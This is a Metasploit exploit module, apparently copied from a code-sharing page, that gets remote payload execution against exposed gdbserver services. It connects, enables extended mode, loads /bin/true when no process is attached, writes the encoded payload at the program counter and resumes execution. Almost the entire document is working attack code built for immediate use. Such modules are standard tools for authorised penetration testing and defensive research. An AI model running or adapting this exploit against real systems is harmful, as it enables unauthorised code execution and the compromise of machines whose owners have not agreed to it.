Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::Gdb
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'GDB Server Remote Payload Execution',
16
        'Description' => %q{
17
          This module attempts to execute an arbitrary payload on a loose gdbserver service.
18
        },
19
        'Author' => [ 'joev' ],
20
        'Targets' => [
21
          [ 'x86', { 'Arch' => ARCH_X86 } ],
22
          [ 'x86_64', { 'Arch' => ARCH_X64 } ],
23
          [ 'ARMLE', { 'Arch' => ARCH_ARMLE } ],
24
          [ 'AARCH64', { 'Arch' => ARCH_AARCH64 } ],
25
        ],
26
        'References' => [
27
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3691']
28
        ],
29
        'DisclosureDate' => '2014-08-24',
30
        'Platform' => %w[linux unix osx],
31
        'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],
32
        'Notes' => {
33
          'SideEffects' => [IOC_IN_LOGS],
34
          'Stability' => [CRASH_SERVICE_DOWN, SERVICE_RESOURCE_LOSS],
35
          'Reliability' => [REPEATABLE_SESSION]
36
        },
37
        'DefaultTarget' => 0,
38
        'DefaultOptions' => {
39
          'PrependFork' => true
40
        }
41
      )
42
    )
43

44
    register_options([
45
      OptString.new('EXE_FILE', [
46
        false,
47
        'The exe to spawn when gdbserver is not attached to a process.',
48
        '/bin/true'
49
      ])
50
    ])
51
  end
52

53
  def exploit
54
    connect
55

56
    print_status('Performing handshake with gdbserver...')
57
    handshake
58

59
    res = enable_extended_mode
60
    if res !~ /OK/
61
      fail_with(Failure::UnexpectedReply, 'Could not enable extended mode.')
62
    end
63

64
    begin
65
      print_status('Stepping program to find PC...')
66
      gdb_data = process_info
67
    rescue BadAckError, BadResponseError
68
      # gdbserver is running with the --multi flag and is not currently
69
      # attached to any process. let's attach to /bin/true or something.
70
      print_status("No process loaded, attempting to load #{datastore['EXE_FILE']}...")
71
      res = run_file(datastore['EXE_FILE'])
72
      if res !~ /OK/
73
        fail_with(Failure::UnexpectedReply, 'Could not load new program.')
74
      end
75
      gdb_data = process_info
76
    end
77

78
    gdb_pc, gdb_arch = gdb_data.values_at(:pc, :arch)
79

80
    unless payload.arch.include?(gdb_arch)
81
      fail_with(Failure::BadConfig, "The payload architecture is incorrect: the payload is #{payload.arch.first}, but #{gdb_arch} was detected from gdb.")
82
    end
83

84
    print_status("Writing payload at #{gdb_pc}...")
85
    write(payload.encoded, gdb_pc)
86

87
    print_status('Executing the payload...')
88
    continue({read: false})
89
  ensure
90
    disconnect if sock
91
  end
92
end
93

94